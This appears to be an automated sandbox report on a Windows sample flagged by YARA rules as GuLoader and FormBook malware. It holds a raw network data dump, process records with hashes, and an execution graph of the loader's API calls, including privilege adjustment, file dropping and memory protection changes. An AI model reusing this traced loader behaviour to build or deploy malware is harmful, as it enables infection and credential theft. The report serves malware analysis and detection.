                                        2024-11-06 15:30:26 UTC8000INData Raw: 7a 9f 70 f9 0e fb f8 51 0b 65 9f 45 b1 ce cb f1 a7 f2 a0 92 b7 0e 2e f2 ee 75 a6 91 7d 7a cf ad 36 97 5f 13 01 bb a0 72 7e 19 9a 15 b4 99 40 47 a8 ce 68 1e 85 f1 0a 95 00 36 b8 27 42 3c 5a 11 78 da 8f 03 ff 1c 05 8c 9d c5 2e d6 0d 70 41 95 a8 9a cb d8 82 e1 30 ae d2 e4 8b 3f 56 0d 2e 47 06 ff 58 95 6b d5 d3 b3 eb dd 2f 49 96 21 a7 a8 5f 8d c2 57 fa 27 3b b8 71 c7 b9 e7 d2 ac 15 df 25 aa 9f e2 73 e6 8a 21 86 15 6e ab db 5f 46 fe 0d 2d ed 4e 97 16 db 9b 57 e1 9d fb 50 74 e9 4a e0 2a 5c d1 7a 84 65 06 01 57 90 6b 6a f0 cf da 85 9f 60 4e 99 7e 9c 0e 10 86 c0 80 7c 83 60 55 2e 55 e2 d8 54 7e 47 b9 44 79 f9 8a 9c e2 a2 5b 3b 22 21 49 22 e0 c6 a3 33 e8 95 33 3f 14 ec 06 df ad 49 55 11 c0 ec 65 b6 6c 89 b8 14 d6 33 74 f1 d6 98 3a bb ff 77 b3 97 44 44 44 e4 f6 68
                                        Data Ascii: zpQeE.u}z6_r~@Gh6'B<Zx.pA0?V.GXk/I!_W';q%s!n_F-NWPtJ*\zeWkj`N~|`U.UT~GDy[;"!I"33?IUel3t:wDDDh


                                        Click to jump to process

                                        Click to jump to process

                                        Click to jump to process

                                        Target ID:0
                                        Start time:10:29:18
                                        Start date:06/11/2024
                                        Path:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\wmKmOQ868z.exe"
                                        Imagebase:0x400000
                                        File size:830'120 bytes
                                        MD5 hash:F7FC33C3BCDED454047A6BFAF99F1452
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2653654327.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:10:30:19
                                        Start date:06/11/2024
                                        Path:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\wmKmOQ868z.exe"
                                        Imagebase:0x400000
                                        File size:830'120 bytes
                                        MD5 hash:F7FC33C3BCDED454047A6BFAF99F1452
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3339767606.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:24.6%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:18.7%
                                          Total number of Nodes:710
                                          Total number of Limit Nodes:23
                                          execution_graph 3047 6f701774 3048 6f7017a3 3047->3048 3049 6f701bff 22 API calls 3048->3049 3050 6f7017aa 3049->3050 3051 6f7017b1 3050->3051 3052 6f7017bd 3050->3052 3053 6f701312 2 API calls 3051->3053 3054 6f7017e4 3052->3054 3055 6f7017c7 3052->3055 3061 6f7017bb 3053->3061 3056 6f7017ea 3054->3056 3057 6f70180e 3054->3057 3058 6f7015dd 3 API calls 3055->3058 3059 6f701654 3 API calls 3056->3059 3060 6f7015dd 3 API calls 3057->3060 3062 6f7017cc 3058->3062 3063 6f7017ef 3059->3063 3060->3061 3064 6f701654 3 API calls 3062->3064 3065 6f701312 2 API calls 3063->3065 3066 6f7017d2 3064->3066 3068 6f7017f5 GlobalFree 3065->3068 3067 6f701312 2 API calls 3066->3067 3069 6f7017d8 GlobalFree 3067->3069 3068->3061 3070 6f701809 GlobalFree 3068->3070 3069->3061 3070->3061 2430 6f701817 2431 6f70184a 2430->2431 2472 6f701bff 2431->2472 2433 6f701851 2434 6f701976 2433->2434 2435 6f701862 2433->2435 2436 6f701869 2433->2436 2522 6f70243e 2435->2522 2506 6f702480 2436->2506 2441 6f7018cd 2445 6f7018d3 2441->2445 2446 6f70191e 2441->2446 2442 6f7018af 2535 6f702655 2442->2535 2443 6f701898 2459 6f70188e 2443->2459 2532 6f702e23 2443->2532 2444 6f70187f 2448 6f701885 2444->2448 2453 6f701890 2444->2453 2554 6f701666 2445->2554 2451 6f702655 10 API calls 2446->2451 2448->2459 2516 6f702b98 2448->2516 2457 6f70190f 2451->2457 2452 6f7018b5 2546 6f701654 2452->2546 2526 6f702810 2453->2526 2463 6f701965 2457->2463 2560 6f702618 2457->2560 2459->2441 2459->2442 2460 6f701896 2460->2459 2461 6f702655 10 API calls 2461->2457 2463->2434 2465 6f70196f GlobalFree 2463->2465 2465->2434 2469 6f701951 2469->2463 2564 6f7015dd wsprintfW 2469->2564 2471 6f70194a FreeLibrary 2471->2469 2567 6f7012bb GlobalAlloc 2472->2567 2474 6f701c26 2568 6f7012bb GlobalAlloc 2474->2568 2476 6f701e6b GlobalFree GlobalFree GlobalFree 2477 6f701e88 2476->2477 2498 6f701ed2 2476->2498 2478 6f70227e 2477->2478 2486 6f701e9d 2477->2486 2477->2498 2480 6f7022a0 GetModuleHandleW 2478->2480 2478->2498 2479 6f701d26 GlobalAlloc 2492 6f701c31 2479->2492 2483 6f7022b1 LoadLibraryW 2480->2483 2484 6f7022c6 2480->2484 2481 6f701d71 lstrcpyW 2485 6f701d7b lstrcpyW 2481->2485 2482 6f701d8f GlobalFree 2482->2492 2483->2484 2483->2498 2575 6f7016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2484->2575 2485->2492 2486->2498 2571 6f7012cc 2486->2571 2488 6f702126 2574 6f7012bb GlobalAlloc 2488->2574 2489 6f702318 2491 6f702325 lstrlenW 2489->2491 2489->2498 2576 6f7016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2491->2576 2492->2476 2492->2479 2492->2481 2492->2482 2492->2485 2492->2488 2496 6f702067 GlobalFree 2492->2496 2497 6f7021ae 2492->2497 2492->2498 2500 6f7012cc 2 API calls 2492->2500 2501 6f701dcd 2492->2501 2494 6f7022d8 2494->2489 2504 6f702302 GetProcAddress 2494->2504 2496->2492 2497->2498 2503 6f702216 lstrcpyW 2497->2503 2498->2433 2499 6f70233f 2499->2498 2500->2492 2501->2492 2569 6f70162f GlobalSize GlobalAlloc 2501->2569 2503->2498 2504->2489 2505 6f70212f 2505->2433 2513 6f702498 2506->2513 2507 6f7012cc GlobalAlloc lstrcpynW 2507->2513 2509 6f7025c1 GlobalFree 2510 6f70186f 2509->2510 2509->2513 2510->2443 2510->2444 2510->2459 2511 6f702540 GlobalAlloc WideCharToMultiByte 2511->2509 2512 6f70256b GlobalAlloc CLSIDFromString 2512->2509 2513->2507 2513->2509 2513->2511 2513->2512 2515 6f70258a 2513->2515 2578 6f70135a 2513->2578 2515->2509 2582 6f7027a4 2515->2582 2518 6f702baa 2516->2518 2517 6f702c4f CreateFileA 2521 6f702c6d 2517->2521 2518->2517 2520 6f702d39 2520->2459 2585 6f702b42 2521->2585 2523 6f702453 2522->2523 2524 6f70245e GlobalAlloc 2523->2524 2525 6f701868 2523->2525 2524->2523 2525->2436 2530 6f702840 2526->2530 2527 6f7028db GlobalAlloc 2531 6f7028fe 2527->2531 2528 6f7028ee 2529 6f7028f4 GlobalSize 2528->2529 2528->2531 2529->2531 2530->2527 2530->2528 2531->2460 2534 6f702e2e 2532->2534 2533 6f702e6e GlobalFree 2534->2533 2589 6f7012bb GlobalAlloc 2535->2589 2537 6f7026d8 MultiByteToWideChar 2544 6f70265f 2537->2544 2538 6f7026fa StringFromGUID2 2538->2544 2539 6f70270b lstrcpynW 2539->2544 2540 6f70271e wsprintfW 2540->2544 2541 6f702742 GlobalFree 2541->2544 2542 6f702777 GlobalFree 2542->2452 2543 6f701312 2 API calls 2543->2544 2544->2537 2544->2538 2544->2539 2544->2540 2544->2541 2544->2542 2544->2543 2590 6f701381 2544->2590 2594 6f7012bb GlobalAlloc 2546->2594 2548 6f701659 2549 6f701666 2 API calls 2548->2549 2550 6f701663 2549->2550 2551 6f701312 2550->2551 2552 6f701355 GlobalFree 2551->2552 2553 6f70131b GlobalAlloc lstrcpynW 2551->2553 2552->2457 2553->2552 2555 6f701672 wsprintfW 2554->2555 2556 6f70169f lstrcpyW 2554->2556 2559 6f7016b8 2555->2559 2556->2559 2559->2461 2561 6f701931 2560->2561 2562 6f702626 2560->2562 2561->2469 2561->2471 2562->2561 2563 6f702642 GlobalFree 2562->2563 2563->2562 2565 6f701312 2 API calls 2564->2565 2566 6f7015fe 2565->2566 2566->2463 2567->2474 2568->2492 2570 6f70164d 2569->2570 2570->2501 2577 6f7012bb GlobalAlloc 2571->2577 2573 6f7012db lstrcpynW 2573->2498 2574->2505 2575->2494 2576->2499 2577->2573 2579 6f701361 2578->2579 2580 6f7012cc 2 API calls 2579->2580 2581 6f70137f 2580->2581 2581->2513 2583 6f7027b2 VirtualAlloc 2582->2583 2584 6f702808 2582->2584 2583->2584 2584->2515 2586 6f702b4d 2585->2586 2587 6f702b52 GetLastError 2586->2587 2588 6f702b5d 2586->2588 2587->2588 2588->2520 2589->2544 2591 6f70138a 2590->2591 2592 6f7013ac 2590->2592 2591->2592 2593 6f701390 lstrcpyW 2591->2593 2592->2544 2593->2592 2594->2548 3071 6f701058 3073 6f701074 3071->3073 3072 6f7010dd 3073->3072 3074 6f701092 3073->3074 3075 6f7015b6 GlobalFree 3073->3075 3076 6f7015b6 GlobalFree 3074->3076 3075->3074 3077 6f7010a2 3076->3077 3078 6f7010b2 3077->3078 3079 6f7010a9 GlobalSize 3077->3079 3080 6f7010b6 GlobalAlloc 3078->3080 3081 6f7010c7 3078->3081 3079->3078 3082 6f7015dd 3 API calls 3080->3082 3083 6f7010d2 GlobalFree 3081->3083 3082->3081 3083->3072 3089 6f701979 3090 6f70199c 3089->3090 3091 6f7019d1 GlobalFree 3090->3091 3092 6f7019e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 3090->3092 3091->3092 3093 6f701312 2 API calls 3092->3093 3094 6f701b6e GlobalFree GlobalFree 3093->3094 3099 6f70103d 3100 6f70101b 5 API calls 3099->3100 3101 6f701056 3100->3101 2595 6f702a7f 2596 6f702acf 2595->2596 2597 6f702a8f VirtualProtect 2595->2597 2597->2596 2598 40352f SetErrorMode GetVersionExW 2599 403583 GetVersionExW 2598->2599 2600 4035bb 2598->2600 2599->2600 2601 403612 2600->2601 2602 406948 5 API calls 2600->2602 2603 4068d8 3 API calls 2601->2603 2602->2601 2604 403628 lstrlenA 2603->2604 2604->2601 2605 403638 2604->2605 2606 406948 5 API calls 2605->2606 2607 40363f 2606->2607 2608 406948 5 API calls 2607->2608 2609 403646 2608->2609 2610 406948 5 API calls 2609->2610 2611 403652 #17 OleInitialize SHGetFileInfoW 2610->2611 2687 406554 lstrcpynW 2611->2687 2614 4036a1 GetCommandLineW 2688 406554 lstrcpynW 2614->2688 2616 4036b3 2617 405e50 CharNextW 2616->2617 2618 4036d9 CharNextW 2617->2618 2624 4036eb 2618->2624 2619 4037ed 2620 403801 GetTempPathW 2619->2620 2689 4034fe 2620->2689 2622 403819 2625 403873 DeleteFileW 2622->2625 2626 40381d GetWindowsDirectoryW lstrcatW 2622->2626 2623 405e50 CharNextW 2623->2624 2624->2619 2624->2623 2632 4037ef 2624->2632 2699 4030a2 GetTickCount GetModuleFileNameW 2625->2699 2628 4034fe 12 API calls 2626->2628 2629 403839 2628->2629 2629->2625 2631 40383d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2629->2631 2630 403887 2638 405e50 CharNextW 2630->2638 2669 40392e 2630->2669 2679 40393e 2630->2679 2633 4034fe 12 API calls 2631->2633 2797 406554 lstrcpynW 2632->2797 2636 40386b 2633->2636 2636->2625 2636->2679 2643 4038a6 2638->2643 2640 403ab0 2644 403ab8 GetCurrentProcess OpenProcessToken 2640->2644 2648 403b34 ExitProcess 2640->2648 2641 403a8c 2867 405bb4 2641->2867 2645 403904 2643->2645 2646 403947 2643->2646 2650 403ad0 LookupPrivilegeValueW AdjustTokenPrivileges 2644->2650 2651 403b04 2644->2651 2798 405f2b 2645->2798 2783 405b1f 2646->2783 2650->2651 2654 406948 5 API calls 2651->2654 2655 403b0b 2654->2655 2658 403b20 ExitWindowsEx 2655->2658 2661 403b2d 2655->2661 2658->2648 2658->2661 2660 403966 2663 40397e 2660->2663 2814 406554 lstrcpynW 2660->2814 2664 40140b 2 API calls 2661->2664 2668 4039a4 wsprintfW 2663->2668 2663->2679 2682 406314 40 API calls 2663->2682 2683 406591 21 API calls 2663->2683 2685 403aa2 CloseHandle 2663->2685 2794 405b37 CreateProcessW 2663->2794 2857 4068b1 FindFirstFileW 2663->2857 2664->2648 2665 403923 2813 406554 lstrcpynW 2665->2813 2670 406591 21 API calls 2668->2670 2727 403c26 2669->2727 2673 4039c8 2670->2673 2674 4039e0 GetFileAttributesW 2673->2674 2675 403a1a SetCurrentDirectoryW 2673->2675 2787 405aa8 CreateDirectoryW 2673->2787 2815 405b02 CreateDirectoryW 2673->2815 2677 4039f7 2674->2677 2678 4039ec DeleteFileW 2674->2678 2790 406314 MoveFileExW 2675->2790 2677->2663 2677->2668 2677->2679 2818 405c60 2677->2818 2678->2677 2860 403b4c 2679->2860 2682->2663 2683->2663 2685->2679 2687->2614 2688->2616 2690 406802 5 API calls 2689->2690 2691 40350a 2690->2691 2692 403514 2691->2692 2871 405e23 lstrlenW CharPrevW 2691->2871 2692->2622 2695 405b02 2 API calls 2696 403522 2695->2696 2874 406073 2696->2874 2878 406044 GetFileAttributesW CreateFileW 2699->2878 2701 4030e2 2719 4030f2 2701->2719 2879 406554 lstrcpynW 2701->2879 2703 403108 2880 405e6f lstrlenW 2703->2880 2707 403119 GetFileSize 2708 403213 2707->2708 2721 403130 2707->2721 2885 40303e 2708->2885 2710 40321c 2712 40324c GlobalAlloc 2710->2712 2710->2719 2921 4034e7 SetFilePointer 2710->2921 2896 4034e7 SetFilePointer 2712->2896 2714 40327f 2718 40303e 6 API calls 2714->2718 2716 403235 2720 4034d1 ReadFile 2716->2720 2717 403267 2897 4032d9 2717->2897 2718->2719 2719->2630 2723 403240 2720->2723 2721->2708 2721->2714 2721->2719 2724 40303e 6 API calls 2721->2724 2918 4034d1 2721->2918 2723->2712 2723->2719 2724->2721 2725 403273 2725->2719 2725->2725 2726 4032b0 SetFilePointer 2725->2726 2726->2719 2728 406948 5 API calls 2727->2728 2729 403c3a 2728->2729 2730 403c52 2729->2730 2732 403c40 2729->2732 2731 406422 3 API calls 2730->2731 2733 403c82 2731->2733 2950 40649b wsprintfW 2732->2950 2735 403ca1 lstrcatW 2733->2735 2737 406422 3 API calls 2733->2737 2736 403c50 2735->2736 2942 403efc 2736->2942 2737->2735 2740 405f2b 18 API calls 2741 403cd3 2740->2741 2742 403d67 2741->2742 2744 406422 3 API calls 2741->2744 2743 405f2b 18 API calls 2742->2743 2745 403d6d 2743->2745 2746 403d05 2744->2746 2747 403d7d LoadImageW 2745->2747 2748 406591 21 API calls 2745->2748 2746->2742 2752 403d26 lstrlenW 2746->2752 2756 405e50 CharNextW 2746->2756 2749 403e23 2747->2749 2750 403da4 RegisterClassW 2747->2750 2748->2747 2751 40140b 2 API calls 2749->2751 2753 403e2d 2750->2753 2754 403dda SystemParametersInfoW CreateWindowExW 2750->2754 2755 403e29 2751->2755 2757 403d34 lstrcmpiW 2752->2757 2758 403d5a 2752->2758 2753->2679 2754->2749 2755->2753 2763 403efc 22 API calls 2755->2763 2760 403d23 2756->2760 2757->2758 2761 403d44 GetFileAttributesW 2757->2761 2759 405e23 3 API calls 2758->2759 2764 403d60 2759->2764 2760->2752 2762 403d50 2761->2762 2762->2758 2765 405e6f 2 API calls 2762->2765 2766 403e3a 2763->2766 2951 406554 lstrcpynW 2764->2951 2765->2758 2768 403e46 ShowWindow 2766->2768 2769 403ec9 2766->2769 2771 4068d8 3 API calls 2768->2771 2952 4056ac OleInitialize 2769->2952 2773 403e5e 2771->2773 2772 403ecf 2774 403ed3 2772->2774 2775 403eeb 2772->2775 2776 403e6c GetClassInfoW 2773->2776 2778 4068d8 3 API calls 2773->2778 2774->2753 2781 40140b 2 API calls 2774->2781 2777 40140b 2 API calls 2775->2777 2779 403e80 GetClassInfoW RegisterClassW 2776->2779 2780 403e96 DialogBoxParamW 2776->2780 2777->2753 2778->2776 2779->2780 2782 40140b 2 API calls 2780->2782 2781->2753 2782->2753 2784 406948 5 API calls 2783->2784 2785 40394c lstrlenW 2784->2785 2786 406554 lstrcpynW 2785->2786 2786->2660 2788 405af4 2787->2788 2789 405af8 GetLastError 2787->2789 2788->2673 2789->2788 2791 403a29 CopyFileW 2790->2791 2792 406328 2790->2792 2791->2663 2791->2679 2960 40619a 2792->2960 2795 405b76 2794->2795 2796 405b6a CloseHandle 2794->2796 2795->2663 2796->2795 2797->2620 2994 406554 lstrcpynW 2798->2994 2800 405f3c 2995 405ece CharNextW CharNextW 2800->2995 2803 403910 2803->2679 2812 406554 lstrcpynW 2803->2812 2804 406802 5 API calls 2809 405f52 2804->2809 2805 405f83 lstrlenW 2806 405f8e 2805->2806 2805->2809 2808 405e23 3 API calls 2806->2808 2807 4068b1 2 API calls 2807->2809 2810 405f93 GetFileAttributesW 2808->2810 2809->2803 2809->2805 2809->2807 2811 405e6f 2 API calls 2809->2811 2810->2803 2811->2805 2812->2665 2813->2669 2814->2663 2816 405b16 GetLastError 2815->2816 2817 405b12 2815->2817 2816->2817 2817->2673 2819 405f2b 18 API calls 2818->2819 2820 405c80 2819->2820 2821 405c88 DeleteFileW 2820->2821 2822 405c9f 2820->2822 2823 405dd6 2821->2823 2828 405dbf 2822->2828 3001 406554 lstrcpynW 2822->3001 2823->2677 2825 405cc5 2826 405cd8 2825->2826 2827 405ccb lstrcatW 2825->2827 2830 405e6f 2 API calls 2826->2830 2829 405cde 2827->2829 2828->2823 2831 4068b1 2 API calls 2828->2831 2832 405cee lstrcatW 2829->2832 2834 405cf9 lstrlenW FindFirstFileW 2829->2834 2830->2829 2833 405de4 2831->2833 2832->2834 2833->2823 2835 405de8 2833->2835 2834->2828 2841 405d1b 2834->2841 2836 405e23 3 API calls 2835->2836 2837 405dee 2836->2837 2839 405c18 5 API calls 2837->2839 2838 405da2 FindNextFileW 2838->2841 2842 405db8 FindClose 2838->2842 2843 405dfa 2839->2843 2841->2838 2853 405d63 2841->2853 3002 406554 lstrcpynW 2841->3002 2842->2828 2844 405e14 2843->2844 2845 405dfe 2843->2845 2847 4055d9 28 API calls 2844->2847 2845->2823 2848 4055d9 28 API calls 2845->2848 2847->2823 2850 405e0b 2848->2850 2849 405c60 64 API calls 2849->2853 2852 406314 40 API calls 2850->2852 2851 4055d9 28 API calls 2851->2838 2854 405e12 2852->2854 2853->2838 2853->2849 2853->2851 2855 4055d9 28 API calls 2853->2855 2856 406314 40 API calls 2853->2856 3003 405c18 2853->3003 2854->2823 2855->2853 2856->2853 2858 4068d2 2857->2858 2859 4068c7 FindClose 2857->2859 2858->2663 2859->2858 2861 403b64 2860->2861 2862 403b56 CloseHandle 2860->2862 3014 403b91 2861->3014 2862->2861 2865 405c60 71 API calls 2866 403a7f OleUninitialize 2865->2866 2866->2640 2866->2641 2869 405bc9 2867->2869 2868 403a9a ExitProcess 2869->2868 2870 405bdd MessageBoxIndirectW 2869->2870 2870->2868 2872 40351c 2871->2872 2873 405e3f lstrcatW 2871->2873 2872->2695 2873->2872 2875 406080 GetTickCount GetTempFileNameW 2874->2875 2876 4060b6 2875->2876 2877 40352d 2875->2877 2876->2875 2876->2877 2877->2622 2878->2701 2879->2703 2881 405e7d 2880->2881 2882 405e83 CharPrevW 2881->2882 2883 40310e 2881->2883 2882->2881 2882->2883 2884 406554 lstrcpynW 2883->2884 2884->2707 2886 403047 2885->2886 2887 40305f 2885->2887 2888 403050 DestroyWindow 2886->2888 2889 403057 2886->2889 2890 403067 2887->2890 2891 40306f GetTickCount 2887->2891 2888->2889 2889->2710 2922 406984 2890->2922 2893 4030a0 2891->2893 2894 40307d CreateDialogParamW ShowWindow 2891->2894 2893->2710 2894->2893 2896->2717 2899 4032f2 2897->2899 2898 403320 2901 4034d1 ReadFile 2898->2901 2899->2898 2928 4034e7 SetFilePointer 2899->2928 2902 40332b 2901->2902 2903 40346a 2902->2903 2904 40333d GetTickCount 2902->2904 2905 403454 2902->2905 2906 4034ac 2903->2906 2909 40346e 2903->2909 2904->2905 2913 403369 2904->2913 2905->2725 2908 4034d1 ReadFile 2906->2908 2907 4034d1 ReadFile 2907->2913 2908->2905 2909->2905 2910 4034d1 ReadFile 2909->2910 2911 4060f6 WriteFile 2909->2911 2910->2909 2911->2909 2912 4033bf GetTickCount 2912->2913 2913->2905 2913->2907 2913->2912 2914 4033e4 MulDiv wsprintfW 2913->2914 2926 4060f6 WriteFile 2913->2926 2929 4055d9 2914->2929 2940 4060c7 ReadFile 2918->2940 2921->2716 2923 4069a1 PeekMessageW 2922->2923 2924 40306d 2923->2924 2925 406997 DispatchMessageW 2923->2925 2924->2710 2925->2923 2927 406114 2926->2927 2927->2913 2928->2898 2930 4055f4 2929->2930 2931 40341a 2929->2931 2932 405610 lstrlenW 2930->2932 2933 406591 21 API calls 2930->2933 2931->2913 2934 405639 2932->2934 2935 40561e lstrlenW 2932->2935 2933->2932 2937 40564c 2934->2937 2938 40563f SetWindowTextW 2934->2938 2935->2931 2936 405630 lstrcatW 2935->2936 2936->2934 2937->2931 2939 405652 SendMessageW SendMessageW SendMessageW 2937->2939 2938->2937 2939->2931 2941 4034e4 2940->2941 2941->2721 2943 403f10 2942->2943 2959 40649b wsprintfW 2943->2959 2945 403f81 2946 403fb5 22 API calls 2945->2946 2948 403f86 2946->2948 2947 403cb1 2947->2740 2948->2947 2949 406591 21 API calls 2948->2949 2949->2948 2950->2736 2951->2742 2953 40451f SendMessageW 2952->2953 2957 4056cf 2953->2957 2954 4056f6 2955 40451f SendMessageW 2954->2955 2956 405708 OleUninitialize 2955->2956 2956->2772 2957->2954 2958 401389 2 API calls 2957->2958 2958->2957 2959->2945 2961 4061f0 GetShortPathNameW 2960->2961 2962 4061ca 2960->2962 2964 406205 2961->2964 2965 40630f 2961->2965 2987 406044 GetFileAttributesW CreateFileW 2962->2987 2964->2965 2967 40620d wsprintfA 2964->2967 2965->2791 2966 4061d4 CloseHandle GetShortPathNameW 2966->2965 2968 4061e8 2966->2968 2969 406591 21 API calls 2967->2969 2968->2961 2968->2965 2970 406235 2969->2970 2988 406044 GetFileAttributesW CreateFileW 2970->2988 2972 406242 2972->2965 2973 406251 GetFileSize GlobalAlloc 2972->2973 2974 406273 2973->2974 2975 406308 CloseHandle 2973->2975 2976 4060c7 ReadFile 2974->2976 2975->2965 2977 40627b 2976->2977 2977->2975 2989 405fa9 lstrlenA 2977->2989 2980 406292 lstrcpyA 2983 4062b4 2980->2983 2981 4062a6 2982 405fa9 4 API calls 2981->2982 2982->2983 2984 4062eb SetFilePointer 2983->2984 2985 4060f6 WriteFile 2984->2985 2986 406301 GlobalFree 2985->2986 2986->2975 2987->2966 2988->2972 2990 405fea lstrlenA 2989->2990 2991 405fc3 lstrcmpiA 2990->2991 2993 405ff2 2990->2993 2992 405fe1 CharNextA 2991->2992 2991->2993 2992->2990 2993->2980 2993->2981 2994->2800 2996 405eeb 2995->2996 2999 405efd 2995->2999 2998 405ef8 CharNextW 2996->2998 2996->2999 2997 405f21 2997->2803 2997->2804 2998->2997 2999->2997 3000 405e50 CharNextW 2999->3000 3000->2999 3001->2825 3002->2841 3011 40601f GetFileAttributesW 3003->3011 3006 405c45 3006->2853 3007 405c33 RemoveDirectoryW 3009 405c41 3007->3009 3008 405c3b DeleteFileW 3008->3009 3009->3006 3010 405c51 SetFileAttributesW 3009->3010 3010->3006 3012 406031 SetFileAttributesW 3011->3012 3013 405c24 3011->3013 3012->3013 3013->3006 3013->3007 3013->3008 3015 403b9f 3014->3015 3016 403b69 3015->3016 3017 403ba4 FreeLibrary GlobalFree 3015->3017 3016->2865 3017->3016 3017->3017 3018 6f701000 3021 6f70101b 3018->3021 3028 6f7015b6 3021->3028 3023 6f701020 3024 6f701024 3023->3024 3025 6f701027 GlobalAlloc 3023->3025 3026 6f7015dd 3 API calls 3024->3026 3025->3024 3027 6f701019 3026->3027 3030 6f7015bc 3028->3030 3029 6f7015c2 3029->3023 3030->3029 3031 6f7015ce GlobalFree 3030->3031 3031->3023 3032 6f7010e1 3041 6f701111 3032->3041 3033 6f7012b0 GlobalFree 3034 6f7011d7 GlobalAlloc 3034->3041 3035 6f701240 GlobalFree 3035->3041 3036 6f70135a 2 API calls 3036->3041 3037 6f7012ab 3037->3033 3038 6f701312 2 API calls 3038->3041 3039 6f70129a GlobalFree 3039->3041 3040 6f701381 lstrcpyW 3040->3041 3041->3033 3041->3034 3041->3035 3041->3036 3041->3037 3041->3038 3041->3039 3041->3040 3042 6f70116b GlobalAlloc 3041->3042 3042->3041 3043 6f702d43 3044 6f702d5b 3043->3044 3045 6f70162f 2 API calls 3044->3045 3046 6f702d76 3045->3046 2269 403fd4 2270 403fec 2269->2270 2271 40414d 2269->2271 2270->2271 2274 403ff8 2270->2274 2272 40419e 2271->2272 2273 40415e GetDlgItem GetDlgItem 2271->2273 2276 4041f8 2272->2276 2288 401389 2 API calls 2272->2288 2275 4044d3 22 API calls 2273->2275 2277 404003 SetWindowPos 2274->2277 2278 404016 2274->2278 2281 404188 SetClassLongW 2275->2281 2295 404148 2276->2295 2343 40451f 2276->2343 2277->2278 2279 404061 2278->2279 2280 40401f ShowWindow 2278->2280 2285 404080 2279->2285 2286 404069 DestroyWindow 2279->2286 2283 40413a 2280->2283 2284 40403f GetWindowLongW 2280->2284 2287 40140b 2 API calls 2281->2287 2382 40453a 2283->2382 2284->2283 2289 404058 ShowWindow 2284->2289 2291 404085 SetWindowLongW 2285->2291 2292 404096 2285->2292 2290 40447d 2286->2290 2287->2272 2293 4041d0 2288->2293 2289->2279 2290->2295 2300 40448d ShowWindow 2290->2300 2291->2295 2292->2283 2298 4040a2 GetDlgItem 2292->2298 2293->2276 2299 4041d4 SendMessageW 2293->2299 2296 40140b 2 API calls 2301 40420a 2296->2301 2297 40445e DestroyWindow EndDialog 2297->2290 2302 4040d0 2298->2302 2303 4040b3 SendMessageW IsWindowEnabled 2298->2303 2299->2295 2300->2295 2301->2295 2301->2296 2301->2297 2309 4044d3 22 API calls 2301->2309 2333 40439e DestroyWindow 2301->2333 2346 406591 2301->2346 2363 4044d3 2301->2363 2305 4040dd 2302->2305 2306 4040f0 2302->2306 2307 404124 SendMessageW 2302->2307 2315 4040d5 2302->2315 2303->2295 2303->2302 2305->2307 2305->2315 2310 4040f8 2306->2310 2311 40410d 2306->2311 2307->2283 2309->2301 2376 40140b 2310->2376 2314 40140b 2 API calls 2311->2314 2312 40410b 2312->2283 2316 404114 2314->2316 2379 4044ac 2315->2379 2316->2283 2316->2315 2318 404285 GetDlgItem 2319 4042a2 ShowWindow KiUserCallbackDispatcher 2318->2319 2320 40429a 2318->2320 2366 4044f5 EnableWindow 2319->2366 2320->2319 2322 4042cc EnableWindow 2327 4042e0 2322->2327 2323 4042e5 GetSystemMenu EnableMenuItem SendMessageW 2324 404315 SendMessageW 2323->2324 2323->2327 2324->2327 2327->2323 2367 404508 SendMessageW 2327->2367 2368 403fb5 2327->2368 2371 406554 lstrcpynW 2327->2371 2329 404344 lstrlenW 2330 406591 21 API calls 2329->2330 2331 40435a SetWindowTextW 2330->2331 2372 401389 2331->2372 2333->2290 2334 4043b8 CreateDialogParamW 2333->2334 2334->2290 2335 4043eb 2334->2335 2336 4044d3 22 API calls 2335->2336 2337 4043f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2336->2337 2338 401389 2 API calls 2337->2338 2339 40443c 2338->2339 2339->2295 2340 404444 ShowWindow 2339->2340 2341 40451f SendMessageW 2340->2341 2342 40445c 2341->2342 2342->2290 2344 404537 2343->2344 2345 404528 SendMessageW 2343->2345 2344->2301 2345->2344 2361 40659c 2346->2361 2347 4067e3 2348 4067fc 2347->2348 2418 406554 lstrcpynW 2347->2418 2348->2301 2350 4067b4 lstrlenW 2350->2361 2351 4066ad GetSystemDirectoryW 2351->2361 2352 406591 15 API calls 2352->2350 2356 4066c3 GetWindowsDirectoryW 2356->2361 2357 406591 15 API calls 2357->2361 2358 406755 lstrcatW 2358->2361 2361->2347 2361->2350 2361->2351 2361->2352 2361->2356 2361->2357 2361->2358 2362 406725 SHGetPathFromIDListW CoTaskMemFree 2361->2362 2396 406422 2361->2396 2401 406948 GetModuleHandleA 2361->2401 2407 406802 2361->2407 2416 40649b wsprintfW 2361->2416 2417 406554 lstrcpynW 2361->2417 2362->2361 2364 406591 21 API calls 2363->2364 2365 4044de SetDlgItemTextW 2364->2365 2365->2318 2366->2322 2367->2327 2369 406591 21 API calls 2368->2369 2370 403fc3 SetWindowTextW 2369->2370 2370->2327 2371->2329 2374 401390 2372->2374 2373 4013fe 2373->2301 2374->2373 2375 4013cb MulDiv SendMessageW 2374->2375 2375->2374 2377 401389 2 API calls 2376->2377 2378 401420 2377->2378 2378->2315 2380 4044b3 2379->2380 2381 4044b9 SendMessageW 2379->2381 2380->2381 2381->2312 2383 4045fd 2382->2383 2384 404552 